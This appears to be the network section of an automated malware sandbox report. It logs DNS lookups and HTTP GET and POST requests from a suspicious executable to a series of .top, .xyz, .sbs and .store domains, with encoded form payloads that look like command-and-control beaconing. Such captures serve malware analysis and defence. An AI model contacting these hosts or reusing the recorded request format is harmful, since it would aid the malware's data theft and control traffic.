                                                                Jan 11, 2025 09:15:58.282329082 CET8049985101.32.205.61192.168.2.7
                                                                Jan 11, 2025 09:15:58.282537937 CET4998580192.168.2.7101.32.205.61
                                                                Jan 11, 2025 09:15:58.285103083 CET4998580192.168.2.7101.32.205.61
                                                                Jan 11, 2025 09:15:58.289963007 CET8049985101.32.205.61192.168.2.7
                                                                Jan 11, 2025 09:16:03.947814941 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:03.952763081 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:03.953047037 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:03.968719006 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:03.973506927 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145494938 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145524979 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145536900 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145550966 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145562887 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145566940 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.145576000 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145593882 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.145612955 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.145689964 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145730972 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145745039 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145756960 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.145780087 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.145807028 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.150415897 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.150482893 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.150501966 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.153920889 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.430495024 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.430512905 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.430525064 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.430556059 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.430567980 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.430649042 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.430979013 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.430989981 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.431078911 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.431143999 CET8049986103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:05.431421995 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:05.477993965 CET4998680192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:06.498919964 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:06.503879070 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:06.503974915 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:06.525942087 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:06.530821085 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695336103 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695373058 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695389986 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695406914 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695425034 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695434093 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:07.695444107 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695477009 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:07.695487976 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:07.695488930 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695507050 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695523024 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695542097 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.695645094 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:07.700385094 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.700403929 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.700423002 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.700489998 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:07.979760885 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.979809046 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.979862928 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.979897976 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.979909897 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:07.979934931 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.980032921 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:07.980109930 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.980214119 CET8049987103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:07.980324030 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:08.040498018 CET4998780192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:09.544012070 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:09.548939943 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:09.549077988 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:09.566020966 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:09.570976973 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:09.571099997 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.742574930 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.742685080 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.742700100 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.742717981 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.742732048 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:10.742749929 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.742775917 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:10.742949963 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.742994070 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.743005037 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:10.743010998 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.743058920 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:10.743120909 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.743165970 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.743271112 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:10.747873068 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.747924089 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.747941971 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.747987032 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:10.748084068 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:10.748125076 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:11.029175043 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:11.029202938 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:11.029220104 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:11.029236078 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:11.029253006 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:11.029309988 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:11.029309988 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:11.029326916 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:11.029344082 CET8049988103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:11.029778004 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:11.029778004 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:11.071875095 CET4998880192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:12.090240002 CET4998980192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:12.095520020 CET8049989103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:12.095616102 CET4998980192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:12.105185032 CET4998980192.168.2.7103.159.36.66
                                                                Jan 11, 2025 09:16:12.110054970 CET8049989103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:13.295727968 CET8049989103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:13.295788050 CET8049989103.159.36.66192.168.2.7
                                                                Jan 11, 2025 09:16:13.295999050 CET4998980192.168.2.7103.159.36.66

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 11, 2025 09:14:48.395653009 CET5256753192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:14:49.480901957 CET5256753192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:14:50.493364096 CET5256753192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:14:51.460630894 CET53525671.1.1.1192.168.2.7
                                                                Jan 11, 2025 09:14:51.460654020 CET53525671.1.1.1192.168.2.7
                                                                Jan 11, 2025 09:14:51.460719109 CET53525671.1.1.1192.168.2.7
                                                                Jan 11, 2025 09:15:07.450752974 CET5830353192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:15:07.463515043 CET53583031.1.1.1192.168.2.7
                                                                Jan 11, 2025 09:15:21.536295891 CET6446253192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:15:21.552731037 CET53644621.1.1.1192.168.2.7
                                                                Jan 11, 2025 09:15:35.372256041 CET5661153192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:15:36.172580957 CET53566111.1.1.1192.168.2.7
                                                                Jan 11, 2025 09:15:49.466932058 CET4933753192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:15:49.682303905 CET53493371.1.1.1192.168.2.7
                                                                Jan 11, 2025 09:16:03.294461012 CET5290953192.168.2.71.1.1.1
                                                                Jan 11, 2025 09:16:03.943408012 CET53529091.1.1.1192.168.2.7

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 11, 2025 09:14:48.395653009 CET192.168.2.71.1.1.10xd21aStandard query (0)www.3nhc3a.topA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:14:49.480901957 CET192.168.2.71.1.1.10xd21aStandard query (0)www.3nhc3a.topA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:14:50.493364096 CET192.168.2.71.1.1.10xd21aStandard query (0)www.3nhc3a.topA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:07.450752974 CET192.168.2.71.1.1.10xf870Standard query (0)www.binjai77rtp11f.xyzA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:21.536295891 CET192.168.2.71.1.1.10x4310Standard query (0)www.vietnamtour.proA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:35.372256041 CET192.168.2.71.1.1.10xc27fStandard query (0)www.showyourstyle.topA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.466932058 CET192.168.2.71.1.1.10x781dStandard query (0)www.rwse6wjx.sbsA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:16:03.294461012 CET192.168.2.71.1.1.10x338eStandard query (0)www.rokeyfashion.storeA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 11, 2025 09:14:51.460630894 CET1.1.1.1192.168.2.70xd21aNo error (0)www.3nhc3a.top20.2.208.137A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:14:51.460654020 CET1.1.1.1192.168.2.70xd21aNo error (0)www.3nhc3a.top20.2.208.137A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:14:51.460719109 CET1.1.1.1192.168.2.70xd21aNo error (0)www.3nhc3a.top20.2.208.137A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:07.463515043 CET1.1.1.1192.168.2.70xf870No error (0)www.binjai77rtp11f.xyz104.21.28.65A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:07.463515043 CET1.1.1.1192.168.2.70xf870No error (0)www.binjai77rtp11f.xyz172.67.144.150A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:21.552731037 CET1.1.1.1192.168.2.70x4310No error (0)www.vietnamtour.pro104.21.54.126A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:21.552731037 CET1.1.1.1192.168.2.70x4310No error (0)www.vietnamtour.pro172.67.138.138A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:36.172580957 CET1.1.1.1192.168.2.70xc27fNo error (0)www.showyourstyle.top69.57.163.64A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)www.rwse6wjx.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:15:49.682303905 CET1.1.1.1192.168.2.70x781dNo error (0)b1-3-r111.kunlundns.top101.32.205.61A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 09:16:03.943408012 CET1.1.1.1192.168.2.70x338eNo error (0)www.rokeyfashion.storerokeyfashion.storeCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 09:16:03.943408012 CET1.1.1.1192.168.2.70x338eNo error (0)rokeyfashion.store103.159.36.66A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.3nhc3a.top
                                                                • www.binjai77rtp11f.xyz
                                                                • www.vietnamtour.pro
                                                                • www.showyourstyle.top
                                                                • www.rwse6wjx.sbs
                                                                • www.rokeyfashion.store

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.74996820.2.208.137803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:14:51.486809969 CET485OUTGET /s1oh/?UfjxuDP=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTV07xmH02YSuxOuXTBNCt6lVM/O+JsRG51Y9B+1PgAZMJBQ/X3Nrmukkh&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.3nhc3a.top
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:14:52.369959116 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sat, 11 Jan 2025 08:14:52 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749970104.21.28.65803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:07.672692060 CET759OUTPOST /9fei/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                Origin: http://www.binjai77rtp11f.xyz
                                                                Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 6d 57 55 52 6a 4b 74 49 4f 31 6a 55 36 4b 6b 2b 68 68 51 4b 4f 4f 76 6f 4d 38 34 6f 53 30 67 74 49 76 66 4d 47 67 4f 6e 30 53 5a 4f 6e 30 37 58 71 2b 66 59 69 4e 47 53 71 6b 67 44 67 70 48 73 50 31 69 38 50 39 49 4a 58 48 77 63 49 53 48 4f 4d 37 69 70 57 75 44 33 50 34 63 4a 42 57 62 48 4d 46 36 52 42 71 50 6b 77 65 51 38 42 63 4b 6b 44 4f 6f 74 58 59 35 2f 46 62 35 65 74 56 67 68 65 48 59 34 52 76 6a 70 30 76 7a 61 6a 49 76 50 49 71 58 6b 47 4d 4b 5a 34 72 59 2f 47 77 62 57 51 65 58 51 52 7a 30 7a 31 38 7a 78 75 4b 4d 6c 70 75 6f 66 59 69 51 76 66 39 69 38 6d 6b 43 4b 73 6f 4a 33 41 41 3d 3d
                                                                Data Ascii: UfjxuDP=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGMKZ4rY/GwbWQeXQRz0z18zxuKMlpuofYiQvf9i8mkCKsoJ3AA==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749971104.21.28.65803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:10.242604971 CET779OUTPOST /9fei/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                Origin: http://www.binjai77rtp11f.xyz
                                                                Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 67 32 45 52 6b 74 5a 49 46 31 6a 58 31 71 6b 2b 76 42 51 57 4f 4f 54 6f 4d 2b 49 43 52 43 77 74 49 4b 62 4d 48 68 4f 6e 33 53 5a 4f 7a 6b 37 53 6e 65 65 55 69 4e 61 67 71 6c 63 44 67 70 37 73 50 30 53 38 49 4f 51 4f 58 58 78 36 45 79 48 4d 54 4c 69 70 57 75 44 33 50 34 35 65 42 57 54 48 50 77 71 52 41 4f 54 6e 35 2b 51 2f 47 63 4b 6b 56 2b 6f 54 58 59 35 34 46 61 55 7a 74 58 49 68 65 47 6f 34 52 2b 6a 6d 36 76 7a 63 39 34 75 6a 49 34 65 38 4f 65 50 69 6e 37 63 79 66 6a 44 55 56 6f 57 79 4c 52 34 66 72 74 4c 4b 71 49 6f 54 2b 49 31 71 61 6a 55 33 53 66 57 64 35 54 6e 67 68 36 6f 7a 57 32 76 39 74 66 6a 49 79 6a 72 30 68 35 52 4e 39 57 6d 43 37 59 77 3d
                                                                Data Ascii: UfjxuDP=wjYsQ7yhn9rJg2ERktZIF1jX1qk+vBQWOOToM+ICRCwtIKbMHhOn3SZOzk7SneeUiNagqlcDgp7sP0S8IOQOXXx6EyHMTLipWuD3P45eBWTHPwqRAOTn5+Q/GcKkV+oTXY54FaUztXIheGo4R+jm6vzc94ujI4e8OePin7cyfjDUVoWyLR4frtLKqIoT+I1qajU3SfWd5Tngh6ozW2v9tfjIyjr0h5RN9WmC7Yw=
                                                                Jan 11, 2025 09:15:11.466694117 CET1236INHTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 08:15:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pzb2zWR0ApYn5koUslE1SI3ryf4I%2B0CNJMvzsIo%2F%2Bwnv0Vh2nctI9mdF21itjAkg7%2FeeqTesWHB9cQDED5GqA4231B4MWTLYj3BhxipK5ixYki%2BT6NRLvsbcj%2BrTuuy6a4xlrhMdT3Hk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003751b783d4349-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1672&rtt_var=836&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=779&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 35 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 57 4b 73 db 36 10 3e 27 33 f9 0f 1b 76 a6 27 41 b4 ec b8 ee b4 92 26 b2 a3 3a 4a 1c 5b 63 cb e9 e3 b6 24 56 14 6c 10 60 00 48 b2 32 f9 f1 1d 90 7a 50 6f db cd 4c 7b a8 0e 22 b1 d8 5d 2c 76 3f 7c 0b be 7a 59 7f fd ee ea ac f7 67 b7 0d 03 97 ca e6 ab 97 75 ff 04 89 2a 69 04 a4 82 e6 ab 97 00 00 f5 01 21 9f be e7 e3 d7 8c 81 13 4e 12 30 56 96 e7 b2 e6 75 af 0b 17 9d cf 6d 38 ed 5c 7e 68 75 4e 4e e0 1b 9c 5e 9d 5d 5d b7 2e a1 f5 ee 53 e7 12 6e 2e ae 7a 70 de 3a bb ba 86 f7 ad eb 0e 74 2e 3b f0 0d 16 76 53 e5 92 7d c9 e2 bc f5 a9 db ba 3c 87 4f ed 4b ff e8 b5 af 6f bb ef 5a bd 76 3d 2c 96 5f 89 33 25 87 2b 61 e6 a2 78 80 c6 92 6b 04 b7 bd df d8 cf c1 da bc c2 94 1a c1 48 d0 38 d3 c6 05 10 6b e5 48 b9 46 30 16 dc 0d 1a 9c 46 22 26 96 0f 2a 20 94 70 02 25 b3 31 4a 6a d4 aa 07 eb fe 06 ce 65 8c be 0c c5 a8 11 fc c1 6e 5b ec 4c a7 19 3a 11 49 2a 39 ef b4 1b c4 13 da 6d 1e 63 3c 20 e6 6d 8c 96 25 63 a5 59 3e b5 db 3a 33 98 a4 f8 64 33 7a c8 84 21 5b b2 3b d8 96 [TRUNCATED]
                                                                Data Ascii: 5ceWKs6>'3v'A&:J[c$Vl`H2zPoL{"],v?|zYgu*i!N0Vum8\~huNN^]].Sn.zp:t.;vS}<OKoZv=,_3%+axkH8kHF0F"&* p%1Jjen[L:I*9mc< m%cY>:3d3z![;4N66"sBpC\G&#ST\AV(X}*%Er!qwCcTU/
                                                                Jan 11, 2025 09:15:11.466736078 CET1145INData Raw: df d3 64 ac 0d 2f 6f f4 54 a8 3b 14 27 27 15 30 2e 83 c5 68 f6 e6 c5 95 b5 85 2b 4b 51 e8 7c 13 15 88 d6 f6 57 01 eb d3 31 53 b0 79 9a 96 44 f9 36 37 28 cd e5 c1 2a e8 a5 50 f7 05 e8 5f e4 b2 7c 6c 48 7a ec 28 ad 44 8c 32 80 81 a1 7e 23 f0 35 b6
                                                                Data Ascii: d/oT;''0.h+KQ|W1SyD67(*P_|lHz(D2~#5h&H%"U-lZr6)&d>d5SZ@Mb3"UUrbd\4vWB.ckTjlm]{N)k5{g}CZ;Q'<7/&pJaX JX
                                                                Jan 11, 2025 09:15:11.509546041 CET1236INData Raw: 32 36 0d 0a 1a 80 04 e1 3b 5a 69 0c d6 8e 67 f0 c0 74 3c 83 47 13 c4 e0 4c 10 6e 03 93 20 dc 46 13 04 66 82 00 00 00 00 ff ff 0d 0a 62 35 0d 0a 1a 1c cd ca 10 d7 81 69 56 86 b8 8e 26 89 c1 99 24 7c 8c 8c 06 24 49 f8 18 19 8d 26 89 c1 99 24 9c 03
                                                                Data Ascii: 26;Zigt<GLn Ffb5iV&$|$I&$-$I8Z&$BB2BzD1cmu1bXmud%Ih@/K(B4](ZQBEIYi%.I0$|mkKK2r+1bF?uAK7+2e7mo0
                                                                Jan 11, 2025 09:15:11.509563923 CET244INData Raw: 46 49 6d 83 e5 30 8f 00 15 1f a8 2c cb 4a f6 24 46 38 27 31 e2 45 94 27 00 00 00 ff ff 0d 0a 63 66 0d 0a ec dc 41 0a c2 30 10 05 d0 ab 78 84 22 66 ea 09 74 a3 08 de 20 48 08 21 d5 91 c6 82 de 5e a6 b8 08 56 21 48 a8 0d fd eb 66 35 9b 47 fa e7 e7
                                                                Data Ascii: FIm0,J$F8'1E'cfA0x"ft H!^V!Hf5GwQVk2(2).(kc{c1)|^9*9jLl[ ;aYq8_Mlm|Bdw>?gs,0gqY]B!"OD+NCQ_`P]
